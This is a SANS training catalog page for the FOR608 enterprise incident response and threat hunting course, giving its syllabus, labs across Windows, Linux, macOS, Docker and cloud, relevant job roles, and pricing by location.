Training
Featured CourseView All Courses
Get a free hour of SANS training

Experience SANS training through course previews.

Learn More
Learning Paths
FeaturedView all Focus Areas
Cloud Security Training
Can't find what you are looking for?

Let us help.

Contact us
Resources
SANS Community Benefits

Connect, learn, and share with other cybersecurity professionals

CISO Network

Engage, challenge, and network with fellow CISOs in this exclusive community of security leaders

Join the SANS Community

Become a member for instant access to our free resources.

Sign Up
For Organizations
Public Sector

Mission-focused cybersecurity training for government, defense, and education

Partnerships

Explore industry-specific programming and customized training solutions

Sponsorship Opportunities

Sponsor a SANS event or research paper

Interested in developing a training plan to fit your organization’s needs?

We're here to help.

Contact Us
Talk with an expert
Talk with an expert

FOR608: Enterprise-Class Incident Response & Threat Hunting

FOR608Digital Forensics and Incident Response
  • 6 Days (Instructor-Led)
  • 36 Hours (Self-Paced)
Course created by:
Mathias FuchsMike PilkingtonTarot (Taz) Wake
Mathias Fuchs, Mike Pilkington & Tarot (Taz) Wake
Register NowCourse Preview
FOR608: Enterprise-Class Incident Response & Threat Hunting
Course created by:
Mathias FuchsMike PilkingtonTarot (Taz) Wake
Mathias Fuchs, Mike Pilkington & Tarot (Taz) Wake
Register NowCourse Preview
  • GIAC Enterprise Incident Responder (GEIR)

    Learn about certification

  • 36 CPEs

    Apply your credits to renew your certifications

  • In-Person, Virtual or Self-Paced

    Attend a live, instructor-led class at a location near you or remotely, or train on your time over 4 months

  • Intermediate Skill Level

    Course material is geared for cyber security professionals with hands-on experience

  • 20 Hands-On Lab(s)

    Apply what you learn with hands-on exercises and labs

Jump to:

Learn to identify and respond to enterprise-class incidents. Deepen your threat hunting abilities using enterprise-class tools and digging into analysis methodologies to understand attacker movement.

Featured Quote

The course content covers a lot of important topics focused on detection and response. I enjoyed the sections on Threat Driven Intelligence and TimeSketch for creating incident timelines.
Reggie M.Amazon

Course Overview

In this enterprise incident response course, you’ll learn to identify and respond to incidents too large to focus on individual machines. The concepts are similar: gathering, analyzing, and making decisions based on information from hundreds of machines. This requires the ability to automate and to quickly focus on the right information for analysis. Using example tools built to operate at enterprise-class scale, you will learn the techniques to collect focused data for incident response and threat hunting. Then, you will dig into analysis methodologies, learning multiple approaches to understand attacker movement and activity across hosts of varying functions and operating systems using timeline, graphing, structured, and unstructured analysis techniques.

What You’ll Learn

  • Know when to perform deep host analysis vs. quick data collection at scale
  • Use collaboration tools for seamless remote teamwork
  • Gather forensic data from on-prem and cloud sources (Azure, M365, AWS)
  • Analyze Linux, Mac, and containerized (e.g., Docker) environments
  • Correlate data (network, endpoint, etc.) to uncover attacker actions
  • Analyze structured and unstructured data to reveal attacker behavior
  • Enrich data to identify IOCs, create detection signatures, and track incidents

Business Takeaways

  • Limit financial and reputational impact through precise incident response
  • Maximize efficiency with effective IR resource management
  • Collaborate seamlessly across teams using dedicated platforms
  • Detect and counter EDR and app control evasion on Windows
  • Analyze and respond to compromised Linux and macOS systems
  • Handle incidents in Docker, M365, AzureAD, and AWS environments

Meet Your Authors

Slide 1 of 0

Course Syllabus

Explore the course syllabus below to view the full range of topics covered in FOR608: Enterprise-Class Incident Response & Threat Hunting.

Section 1Proactive Detection and Response

Section one focuses on proactive cyber defense through early detection, rapid response, and collaboration using frameworks like MITRE ATT&CK. It covers active defense tactics like honeypots and canaries, as well as efficient incident response with tools like Aurora. We conclude with threat intelligence fundamentals and using platforms like MISP and OpenCTI.

Topics covered

  • Enterprise Incident Response and Threat Hunting
  • Managing Large-Scale Response
  • Intel-Driven Incident Response
  • Scalable & Collaborative Analysis with Timesketch

Labs

  • Development of honey tokens for active detection
  • Documenting an initial alert in Aurora
  • Using Timesketch to analyze a potential breach
  • Using OpenCTI to analyze threat reports

Section 2Scaling Response and Analysis

Section two shifts to active response, starting with scoping an intrusion at Stark Research Labs. It highlights EDR evasion techniques and introduces Velociraptor for large-scale incident response. The section also covers integrating Velociraptor with Elasticsearch and emphasizes rapid, targeted data collection on specific hosts.

Topics covered

  • EDR and EDR Bypass
  • Scaling Incident Response with Velociraptor
  • Scaling Analysis with ELK
  • Rapid Response Triage

Labs

  • Analyzing Sysmon telemetry and log events
  • Analyzing data collected during an intrusion incident
  • Deploying a small Velociraptor client-server setup
  • Using the Elasticsearch SQL API
  • Acquiring forensic triage images using Velociraptor and CyLR

Section 3Modern Attacks against Windows and Linux DFIR

Section three focuses on host-based forensics, covering Windows attacks like ransomware and LOLBAS, with detection using Sigma rules, Elasticsearch, and Hayabusa. It then shifts to Linux DFIR, addressing exploits, file systems, logging, and hardening—building skills to investigate both Windows and Linux intrusions.

Topics covered

  • Modern Attacks Against Windows
  • Introduction to Linux
  • Modern Attacks Against Linux
  • Linux DFIR Fundamentals and Log Analysis
  • Linux Triage Collection and Forensic Readiness

Labs

  • Detecting LOLBAS activity via Sigma
  • Rapid event log analysis with Hayabusa
  • Linux web log analysis
  • Triaging Linux hosts

Section 4Analyzing macOS and Docker Containers

This section covers macOS incident response, including its ecosystem, data acquisition, log analysis, and key artifacts. It also introduces containerized environments, focusing on Docker and its role in modern enterprise investigations.

Topics covered

  • macOS Foundations
  • Apple Filesystems
  • Mac Incident Response
  • Containers in the Enterprise
  • DFIR for Containers

Labs

  • Mount and analyze APFS disk images
  • Review macOS artifacts and logs
  • Docker administration and logs
  • Docker triage and IR

Section 5Cloud Attacks and Response

This section covers incident response in Microsoft Azure, M365, and AWS, highlighting unique cloud challenges and the MITRE ATT&CK® Cloud Matrix. It focuses on common attack scenarios, key logs, and tools like GuardDuty. It concludes with strategies for cloud response using security accounts, AMIs, and automation tools like Lambda and Step Functions.

Topics covered

  • DFIR in the Cloud
  • Incident Response in Azure & M365
  • Attackers in the Cloud; AWS Foundations
  • Incident Response in AWS
  • IR Automation in AWS

Labs

  • M365 log analysis
  • Finding attacker cloud exfil infrastructure
  • AWS CloudTrail log analysis
  • AWS VPC Flow log analysis

Section 6Capstone: Enterprise-Class IR Challenge

Section six is the capstone exercise, where students apply course concepts to analyze a multi-platform breach. Using real-world tools and techniques, they’ll investigate an end-to-end incident across hosts and cloud systems, working in teams to simulate real-world response.

Things You Need To Know

Relevant Job Roles

Cyber Incident Responder

European Cybersecurity Skills Framework

Monitor the organisation’s cybersecurity state, handle incidents during cyber-attacks and assure the continued operations of ICT systems.

Explore learning path

Insider Threat Analysis

NICE: Protection and Defense

Responsible for identifying and assessing the capabilities and activities of cybersecurity insider threats; produces findings to help initialize and support law enforcement and counterintelligence activities and investigations.

Explore learning path

Digital Forensics (OPM 212)

NICE: Protection and Defense

Responsible for analyzing digital evidence from computer security incidents to derive useful information in support of system and network vulnerability mitigation.

Explore learning path

Cybercrime Investigation (OPM 221)

NICE: Investigation

Responsible for investigating cyberspace intrusion incidents and crimes. Applies tactics, techniques, and procedures for a full range of investigative tools and processes and appropriately balances the benefits of prosecution versus intelligence gathering.

Explore learning path

Military Operations / Law Enforcement Agents

Digital Forensics and Incident Response

Execute digital forensic operations under demanding conditions, rapidly extracting critical intelligence from diverse devices. Leverage advanced threat hunting and malware analysis skills to neutralize sophisticated cyber adversaries.

Explore learning path

Cybersecurity Analyst / Engineer

Cyber Defense

As this is one of the highest-paid jobs in the field, the skills required to master the responsibilities involved are advanced. You must be highly competent in threat detection, threat analysis, and threat protection. This is a vital role in preserving the security and integrity of an organization’s data.

Explore learning path

Incident Response (OPM 531)

NICE: Protection and Defense

Responsible for investigating, analyzing, and responding to network cybersecurity incidents.

Explore learning path

Digital Evidence Analysis (OPM 211)

NICE: Investigation

Responsible for identifying, collecting, examining, and preserving digital evidence using controlled and documented analytical and investigative techniques.

Explore learning path

Course Schedule & Pricing

Looking for Group Purchase Options?Contact Us

GIAC Certification Attempt

Add a GIAC certification attempt and receive free two practice tests. View pricing in the info icons below.

OnDemand Course Access

When purchasing a live instructor-led class, add an additional 4 months of online access after your course. View pricing in the info icons below.

Filter by:
  • Location & instructor

    Virtual (OnDemand)

    Instructed by Mike Pilkington
    Date & Time
    OnDemand (Anytime)Self-Paced, 4 months access
    Course price
    $8,780 USD*Prices exclude applicable local taxes
    Enrollment options
    Self-Paced
  • Location & instructor

    Riyadh, SA & Virtual (live)

    Instructed by Mathias Fuchs
    Date & Time
    Fetching schedule..View event details
    Course price
    $8,900 USD*Prices exclude applicable local taxes
    Enrollment options
    In-PersonVirtual
  • Location & instructor

    Washington, DC, US & Virtual (live)

    Instructed by Marcus Guevara
    Date & Time
    Fetching schedule..View event details
    Course price
    $8,780 USD*Prices exclude applicable local taxes
    Enrollment options
    In-PersonVirtual
  • Location & instructor

    Salt Lake City, UT, US & Virtual (live)

    Instructed by Mike Pilkington
    Date & Time
    Fetching schedule..View event details
    Course price
    $8,780 USD*Prices exclude applicable local taxes
    Enrollment options
    In-PersonVirtual
  • Location & instructor

    Malaga, ES

    Instructed by Mathias Fuchs
    Date & Time
    Fetching schedule..View event details
    Course price
    €8,230 EUR*Prices exclude applicable local taxes
    Enrollment options
    In-Person
  • Location & instructor

    Las Vegas, NV, US & Virtual (live)

    Instructed by Mike Pilkington
    Date & Time
    Fetching schedule..View event details
    Course price
    $8,780 USD*Prices exclude applicable local taxes
    Enrollment options
    In-PersonVirtual
  • Location & instructor

    Virtual (live)

    Date & Time
    Fetching schedule..View event details
    Course price
    $8,780 USD*Prices exclude applicable local taxes
    Enrollment options
    Virtual
  • Location & instructor

    Singapore, SG & Virtual (live)

    Instructed by Mathias Fuchs
    Date & Time
    Fetching schedule..View event details
    Course price
    $8,900 USD*Prices exclude applicable local taxes
    Enrollment options
    In-PersonVirtual
Showing 8 of 13

Learn Alongside Leading Cybersecurity Professionals From Around The World

Slide 1 of 0

Benefits of Learning with SANS

Instructor teaching class with code in the background

Get feedback from the world’s best cybersecurity experts and instructors

Learning via laptop

Choose how you want to learn - online, on demand, or at our live in-person training events

Learning via laptop

Get access to our range of industry-leading courses and resources